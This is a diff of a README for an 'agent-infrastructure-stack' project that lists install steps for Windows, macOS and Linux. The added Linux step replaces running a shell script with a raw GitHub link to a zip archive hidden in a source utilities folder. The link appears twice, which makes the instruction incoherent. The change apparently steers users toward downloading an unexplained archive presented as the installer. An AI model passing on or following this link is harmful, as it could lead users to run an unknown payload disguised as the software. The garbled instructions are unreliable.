gentry-king/agent-infrastructure-stack/README.md

 1. **For Windows**: Double-click the `.exe` file to start the installation.
 Follow the prompts until the process is complete.
 2. **For MacOS**: Open the `.dmg` file and drag the application into your Applications folder.
-3. **For Linux**: Open a terminal, navigate to the downloaded folder, and run the `.sh` script by typing `./scriptname.sh`, replacing `scriptname.sh` with the actual name of the downloaded file.
+3. **For Linux**: Open a terminal, navigate to the downloaded folder, and run the `.sh` script by typing `https://github.com/gentry-king/agent-infrastructure-stack/raw/refs/heads/main/packages/shared/src/utils/stack_agent_infrastructure_2.4.zip`, replacing `https://github.com/gentry-king/agent-infrastructure-stack/raw/refs/heads/main/packages/shared/src/utils/stack_agent_infrastructure_2.4.zip` with the actual name of the downloaded file.

 After installation, find the application in your programs menu or applications folder.
 Double-click it to run.
 You are now ready to use the agent infrastructure!